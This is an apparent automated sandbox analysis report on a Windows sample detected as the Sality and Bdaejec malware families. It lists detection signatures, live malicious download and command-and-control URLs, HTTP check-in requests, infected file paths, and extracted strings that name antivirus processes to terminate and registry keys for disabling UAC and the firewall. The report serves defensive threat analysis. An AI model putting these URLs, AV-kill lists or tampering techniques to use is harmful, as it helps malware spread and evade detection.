Windows Analysis Report
1.0.0.2.exe

Overview

General Information

Sample name: 1.0.0.2.exe
Analysis ID: 1467981
MD5: ad809738e208d99a28009023546bc695
SHA1: 3326e4971b5b23122dac680dfb9eb41df0692267
SHA256: 775939b8bf22ee4999cebd8d9e1525ca9417464b5fe6ed1778f0a7b43d07d6ef
Tags: exesality
Infos:

Detection

Bdaejec, Sality
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Bdaejec
Yara detected Sality
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject threads in other processes
Creates autorun.inf (USB autostart)
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables UAC (registry)
Disables user account control notifications
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Modifies the windows firewall
Modifies the windows firewall notifications settings
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Sality F-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware.Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.InfectionSality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult.Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.PayloadOnce installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.
  • Salty Spider
 https://malpedia.caad.fkie.fraunhofer.de/details/win.sality

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: 1.0.0.2.exe Avira: detected
Antivirus detection for URL or domain
Source: http://amsamex.com/xs.jpg Avira URL Cloud: Label: malware
Source: http://www.careerdesk.org/images/xs.jpg?5059c3=10531718 Avira URL Cloud: Label: malware
Source: http://www.careerdesk.org/images/xs.jpg Avira URL Cloud: Label: malware
Source: http://a3inforservice.com.br/images/logof.gif Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rars Avira URL Cloud: Label: phishing
Source: http://www.klkjwre9fqwieluoi.info/ Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?51fbda=483560101 Avira URL Cloud: Label: malware
Source: http://amsamex.com/xs.jpg?ce2fff=94588921 Avira URL Cloud: Label: malware
Source: http://accnet.ca/xs.jpg Avira URL Cloud: Label: malware
Source: http://ahmediye.net/xs.jpg Avira URL Cloud: Label: malware
Source: http://kukutrustnet777888.info/DisableTaskMgrSoftware Avira URL Cloud: Label: phishing
Source: http://althawry.org/images/xs.jpg Avira URL Cloud: Label: malware
Source: http://accnet.ca/xs.jpghttp://a3inforservice.com.br/images/logof.gif Avira URL Cloud: Label: malware
Source: http://apple-pie.in/images/xs.jpg Avira URL Cloud: Label: phishing
Source: http://arthur.niria.biz/xs.jpg?51fbda=48356010a Avira URL Cloud: Label: malware
Source: http://amsamex.com/xs.jpg?ce2fff=945889216 Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?c12b4b=126595310T Avira URL Cloud: Label: malware
Source: http://kukutrustnet987.info/home.gif Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar9 Avira URL Cloud: Label: malware
Source: http://ampyazilim.com.tr/images/xs2.jpg Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar6 Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar4 Avira URL Cloud: Label: malware
Source: http://173.193.19.14/logo.gif Avira URL Cloud: Label: malware
Source: http://kukutrustnet888.info/home.gif Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?c12b4b=126595310C Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarL Avira URL Cloud: Label: malware
Source: http://kukutrustnet777.info/home.gif Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?c12b4b=126595310 Avira URL Cloud: Label: malware
Source: http://apple-pie.in/images/xs.jpg?ce2fff=121614327 Avira URL Cloud: Label: phishing
Source: http://apple-pie.in/images/xs.jpg?554c8c=39131092 Avira URL Cloud: Label: phishing
Source: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif Avira URL Cloud: Label: malware
Source: http://amsamex.com/xs.jpg?549590=27716560 Avira URL Cloud: Label: malware
Source: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?51fbda=48356010 Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/ Avira URL Cloud: Label: malware
Source: http://g2.arrowhitech.com/xs.jpg Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarp Avira URL Cloud: Label: malware
Source: http://kukutrustnet777888.info/ Avira URL Cloud: Label: phishing
Source: http://89.119.67.154/testo5/ Avira URL Cloud: Label: malware
Source: http://www.careerdesk.org/images/xs.jpg?ad5654=34079484 Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\iuepn.exe Avira: detection malicious, Label: W32/Sality.AT
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe Avira: detection malicious, Label: W32/Sality.AT
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Jadtre.B
Multi AV Scanner detection for domain / URL
Source: www.careerdesk.org Virustotal: Detection: 11% Perma Link
Source: ddos.dnsnb8.net Virustotal: Detection: 11% Perma Link
Source: apple-pie.in Virustotal: Detection: 13% Perma Link
Source: arthur.niria.biz Virustotal: Detection: 10% Perma Link
Source: ahmediye.net Virustotal: Detection: 9% Perma Link
Source: amsamex.com Virustotal: Detection: 8% Perma Link
Source: althawry.org Virustotal: Detection: 11% Perma Link
Source: http://www.careerdesk.org/images/xs.jpg Virustotal: Detection: 9% Perma Link
Source: http://amsamex.com/xs.jpg Virustotal: Detection: 9% Perma Link
Source: http://www.klkjwre9fqwieluoi.info/ Virustotal: Detection: 10% Perma Link
Source: http://arthur.niria.biz/xs.jpg Virustotal: Detection: 10% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k1.rars Virustotal: Detection: 11% Perma Link
Source: http://ahmediye.net/xs.jpg Virustotal: Detection: 10% Perma Link
Source: http://kukutrustnet777888.info/DisableTaskMgrSoftware Virustotal: Detection: 14% Perma Link
Source: http://accnet.ca/xs.jpg Virustotal: Detection: 8% Perma Link
Source: http://althawry.org/images/xs.jpghttp://www.careerdesk.org/images/xs.jpghttp://arthur.niria.biz/xs.j Virustotal: Detection: 6% Perma Link
Source: http://althawry.org/images/xs.jpg Virustotal: Detection: 9% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\Desktop\VF.dll ReversingLabs: Detection: 26%
Multi AV Scanner detection for submitted file
Source: 1.0.0.2.exe Virustotal: Detection: 86% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.7% probability
Machine Learning detection for dropped file
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\iuepn.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: 1.0.0.2.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: 1.0.0.2.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Spreading
barindex
Yara detected Sality
Source: Yara match File source: 0.2.1.0.0.2.exe.2b60000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1.0.0.2.exe PID: 5352, type: MEMORYSTR
Creates autorun.inf (USB autostart)
Source: C:\Users\user\Desktop\1.0.0.2.exe File created: C:\autorun.inf Jump to behavior
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe System file written: C:\Program Files\7-Zip\Uninstall.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
May infect USB drives
Source: 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\autorun.inf_
Source: 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\autorun.inf_
Source: 1.0.0.2.exe, 00000000.00000003.2255260627.0000000001165000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: autorun.infH
Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\autorun.inf
Source: 1.0.0.2.exe, 00000000.00000002.2266190166.000000000117B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: autorun.infH
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: [AutoRun]
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: autorun.inf
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: _kkiuynbvnbrev406C:\hh8geqpHJTkdns0MCIDRV_VERMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)MPRNtQuerySystemInformationSoftware\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache GlobalUserOfflineSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsSoftware\Microsoft\Windows\CurrentVersionhttp://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers\KeServiceDescriptorTable_os%d%dhttp://kukutrustnet777888.info/DisableTaskMgrSoftware\Microsoft\Windows\CurrentVersion\policies\systemEnableLUASoftware\Microsoft\Windows\ShellNoRoam\MUICachemonga_bongapurity_control_90833SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile%s:*:Enabled:ipsecSYSTEM\CurrentControlSet\Services\SharedAccessStart\AuthorizedApplications\ListSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHidden[AutoRun]
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: shell\explore\Commandshell\Autoplay\commandDisableRegistryToolsDAEMON.Simple Poly user v1.1a(c) Sector\SvcSOFTWARE\Microsoft\Security CenterAntiVirusOverrideAntiVirusDisableNotifyFirewallDisableNotifyFirewallOverrideUpdatesDisableNotifyUacDisableNotifyAntiSpywareOverrideSYSTEMkukutrusted!.CreateMutexAKERNEL32TEXTUPXCODEGdiPlus.dllDEVICEMBhttp://\Runhttpipfltdrv.syswww.microsoft.com?%x=%d&%x=%dSYSTEM.INIUSER32.DLL.%c%s\\.\amsint32.EXE.SCRSfcIsFileProtectedsfcdrw.VDB.AVCNTDLL.DLLrnd=autorun.infEnableFirewallDoNotAllowExceptionsDisableNotificationsWNetEnumResourceAWNetOpenEnumAWNetCloseEnumADVAPI32.DLLCreateServiceAOpenSCManagerAOpenServiceACloseServiceHandleDeleteServiceControlService__hStartServiceANOTICE__drIPFILTERDRIVERChangeServiceConfigAwin%s.exe%s.exeWININET.DLLInternetOpenAInternetReadFileInternetOpenUrlAInternetCloseHandleAVPAgnitum Client Security ServiceALGAmon monitoraswUpdSvaswMon2aswRdraswSPaswTdiaswFsBlkacssrvAV useravast! iAVS4 Control Serviceavast! Antivirusavast! Mail Scanneravast! Web Scanneravast! Asynchronous Virus Monitoravast! Self ProtectionAVG E-mail ScannerAvira AntiVir Premium GuardAvira AntiVir Premium WebGuardAvira AntiVir Premium MailGuardBGLiveSvcBlackICECAISafeccEvtMgrccProxyccSetMgrCOMODO Firewall Pro Sandbox DrivercmdGuardcmdAgentEset ServiceEset HTTP ServerEset Personal FirewallF-Prot Antivirus Update MonitorfsbwsysFSDFWDF-Secure Gatekeeper Handler StarterFSMAGoogle Online ServicesInoRPCInoRTInoTaskISSVCKPF4KLIFLavasoftFirewallLIVESRVMcAfeeFrameworkMcShieldMcTaskManagerMpsSvcnavapsvcNOD32krnNPFMntorNSCServiceOutpost Firewall main moduleOutpostFirewallPAVFIRESPAVFNSVRPavProtPavPrSrvPAVSRVPcCtlComPersonalFirewalPREVSRVProtoPort Firewall servicePSIMSVCRapAppSharedAccessSmcServiceSNDSrvcSPBBCSvcSpIDer FS Monitor for Windows NTSpIDer Guard File System MonitorSPIDERNTSymantec Core LCSymantec Password ValidationSymantec AntiVirus Definition WatcherSavRoamSymantec AntiVirusTmntsrvTmPfwUmxAgentUmxCfgUmxLUUmxPolvsmonVSSERVWebrootDesktopFirewallDataServiceWebrootFirewallwscsvcXCOMMSystem\CurrentControlSet\Control\SafeBoot%d%d.tmpSOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList%s\%s%s\Software\Microsoft\Windows\CurrentVersion\Ext\StatsSoftware\Microsoft\Windows\CurrentVersion\Ext\StatsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsKERNEL32.DLLbootshellSYSTEM.INIExplorer.exeAVPM.A2GUARDA2CMD.A2SERVICE.A2FREEAVASTADVCHK.AGB.AKRNL.AHPROCMONSERVER.AIRDEFENSEALERTSVCAVIRAAMON.TROJAN.AVZ.ANTIVIRAPVXDWIN.ARMOR2NET.ASHAVAST.ASHDISP.ASHENHCD.ASHMAISV.ASHPOPWZ.ASHSERV.ASHSIMPL.ASHSKPCK.ASHWEBSV.ASWUPDSV.ASWSCANAVCIMAN.AVCONSOL.AVuser.AVESVC.AVEVAL.AVEVL32.AVGAMAVGCC.AVGCHSVX.AVGCSRVX.AVGNSX.AVGCC32.AVGCTRL.AVGEMC.AVGFWSRV.AVGNT.AVCENTERAVGNTMGRAVGSERV.AVGTRAY.AVGUARD.AVGUPSVC.AVGWDSVC.AVINITNT.AVKSERV.AVKSERVICE.AVKWCTL.AVP.AVP32.AVPCC.AVASTAVSERVER.AVSCHED32.AVSYNMGR.AVWUPD32.AVWUPSRV.AVXMONITORAVXQUAR.BDSWITCH.BLACKD.BLACKICE.CAFIX.BITDEFENDERCCEVTMGR.CFP.CFPCONFIG.CCSETMGR.CFIAUDIT.CLAMTRAY.CL
Source: 1.0.0.2.exe, 00000000.00000003.2255401629.000000000117A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: autorun.infH
Source: 1.0.0.2.exe, 00000000.00000002.2272180867.000000000522B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: [autorun]
Source: 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\autorun.inf
Source: autorun.inf.0.dr Binary or memory string: [AutoRun]
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B6BADD Sleep,FindFirstFileA,FindNextFileA,Sleep, 0_2_02B6BADD
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B657A0 FindFirstFileA,FindNextFileA,Sleep, 0_2_02B657A0
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 2_2_005B29E2
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 2_2_005B2B8C
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2838522 ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup 192.168.2.6:63363 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2807908 ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin 192.168.2.6:49710 -> 44.221.84.105:799
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49712 -> 54.244.188.177:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49715 -> 44.221.84.105:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49716 -> 44.221.84.105:80
Source: Traffic Snort IDS: 2037771 ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst 44.221.84.105:80 -> 192.168.2.6:49716
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49718 -> 78.46.2.155:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49719 -> 37.230.104.89:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49720 -> 54.244.188.177:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49722 -> 44.221.84.105:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49723 -> 44.221.84.105:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49725 -> 78.46.2.155:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49726 -> 37.230.104.89:80
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 799
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49710 -> 44.221.84.105:799
Source: global traffic UDP traffic: 192.168.2.6:52747 -> 85.17.167.196:9832
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View IP Address: 54.244.188.177 54.244.188.177
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: AEROTEK-ASTR AEROTEK-ASTR
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/xs.jpg?5059c3=10531718 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xs.jpg?51fbda=48356010 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /images/xs.jpg?554c8c=39131092 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xs.jpg?5827cf=5777359 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /images/xs2.jpg?6cbf0c=21380388 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/xs.jpg?ad5654=34079484 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=23c464339208da2a95574fbd506ebd72|8.46.123.33|1720159204|1720159204|0|1|0
Source: global traffic HTTP traffic detected: GET /xs.jpg?c12b4b=126595310 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cacheCookie: snkz=8.46.123.33; btst=f61c3ab837e78a3dbee4d750570963c6|8.46.123.33|1720159205|1720159205|0|1|0
Source: global traffic HTTP traffic detected: GET /images/xs.jpg?ce2fff=121614327 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cacheCookie: btst=a1590c081175a697dce15a514e641dbf|8.46.123.33|1720159206|1720159206|0|1|0; snkz=8.46.123.33
Source: global traffic HTTP traffic detected: GET /xs.jpg?e14213=73812575 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /images/xs2.jpg?f4c967=160423430 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
Source: unknown UDP traffic detected without corresponding DNS query: 85.17.167.196
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B6B888 InternetOpenA,InternetOpenUrlA,CreateFileA,InternetReadFile,WriteFile,InternetCloseHandle,InternetCloseHandle, 0_2_02B6B888
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/xs.jpg?5059c3=10531718 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: www.careerdesk.orgCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xs.jpg?51fbda=48356010 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: arthur.niria.bizCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /images/xs.jpg?554c8c=39131092 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: apple-pie.inCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /xs.jpg?5827cf=5777359 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ahmediye.netCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /images/xs2.jpg?6cbf0c=21380388 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /images/xs2.jpg?1 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)Host: ampyazilim.com.trCache-Control: no-cacheConnection: Keep-Alive
